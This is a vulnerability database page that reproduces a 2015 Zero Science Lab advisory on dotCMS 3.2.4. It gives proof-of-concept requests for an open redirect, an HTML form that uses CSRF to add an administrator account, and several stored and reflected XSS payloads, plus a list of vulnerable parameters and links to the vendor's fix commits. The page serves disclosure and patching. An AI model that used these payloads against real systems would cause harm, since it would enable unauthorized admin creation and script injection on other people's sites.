Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

dotCMS 3.2.4 CSRF / XSS / Open Redirect

🗓️ 08 Dec 2015 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

dotCMS 3.2.4 Multiple Vulnerabilities - Open Redirect, CSRF, XS

Code
`  
dotCMS 3.2.4 Multiple Vulnerabilities  
  
  
Vendor: dotCMS Software, LLC  
Product web page: http://www.dotcms.com  
Affected version: 3.2.4 (Enterprise)  
  
Summary: DotCMS is the next generation of Content Management System (CMS).  
Quick to deploy, open source, Java-based, open APIs, extensible and massively  
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel  
sites, web apps, campaigns, one-pagers, intranets - all types of content  
driven experiences - without calling in your developers.  
  
Desc: The application suffers from multiple security vulnerabilities including:  
Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request  
Forgery (CSRF).  
  
Tested on: Apache-Coyote/1.1  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5290  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php  
  
Vendor: http://dotcms.com/docs/latest/change-log  
https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305  
https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3  
  
  
19.11.2015  
  
--  
  
  
1. Open Redirect via '_EXT_LANG_redirect' GET parameter:  
--------------------------------------------------------  
  
http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia  
  
  
  
2. CSRF Add Admin:  
------------------  
  
<html>  
<body>  
<form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">  
<input type="hidden" name="callCount" value="1  
windowName=c0-param2  
c0-scriptName=UserAjax  
c0-methodName=addUser  
c0-id=0  
c0-param0=null:null  
c0-param1=string:TEST2  
c0-param2=string:AAAA2  
c0-param3=string:AAA2%40bb.net  
c0-param4=string:123123  
batchId=3  
instanceId=0  
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1448026121316  
scriptSessionId=hd2XkJoJcyP9lEk5N8qUe*ouv5l/mn17B5l-IA*1ZViJ6  
" />  
<input type="submit" value="Tutaj" />  
</form>  
</body>  
</html>  
  
  
  
3. Multiple Stored And Reflected XSS:  
-------------------------------------  
  
POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1  
Host: 127.0.0.1  
  
callCount=1  
windowName=c0-param0  
c0-scriptName=TagAjax  
c0-methodName=addTag  
c0-id=0  
c0-param0=<script>alert(1)<%2fscript>  
c0-param1=string:  
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20  
batchId=2  
instanceId=0  
......  
  
  
  
POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1  
Host: 127.0.0.1  
  
callCount=1  
windowName=c0-param5  
c0-scriptName=CategoryAjax  
c0-methodName=saveOrUpdateCategory  
c0-id=0  
c0-param0=boolean:true  
c0-param1=null:null  
c0-param2=<script>alert(2)<%2fscript>  
c0-param3=string:ppp  
c0-param4=string:aaa  
c0-param5=string:bbb  
batchId=2  
instanceId=0  
......  
  
  
  
POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1  
Host: 127.0.0.1  
  
query=aaaa  
offset="><script>alert(3)<%2fscript>  
limit=20  
sort=1  
userid=admin  
reindexResults=true  
......  
  
  
  
http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]  
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]  
http://127.0.0.1/c/portal/layout [limit parameter]  
http://127.0.0.1/c/portal/layout [offset parameter]  
http://127.0.0.1/c/portal/layout [query parameter]  
http://127.0.0.1/c/portal/layout [sort parameter]  
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]  
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Dec 2015 00:00Current
7.4High risk
Vulners AI Score7.4
dotcmsopen redirectcross-site request forgeryxsssecurity vulnerabilitiesjava-basedcontent management systemopen sourcevulnerability report
34